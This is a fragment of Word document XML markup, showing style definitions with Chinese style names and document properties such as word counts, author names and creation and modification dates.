    <w:rsid w:val="780209FA"/>
    <w:rsid w:val="7B720688"/>
    <w:rsid w:val="7C68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字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>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character" w:customStyle="1" w:styleId="13">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="8"/>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2044</Words>
  <Characters>3145</Characters>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>27</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3429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2021-09-22T01:42:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>孙悦</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-21T03:05:00Z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84B67DDEA5B04E43B97F30EDC10C487E_13</vt:lpwstr>
  </property>
</Properties>
</file>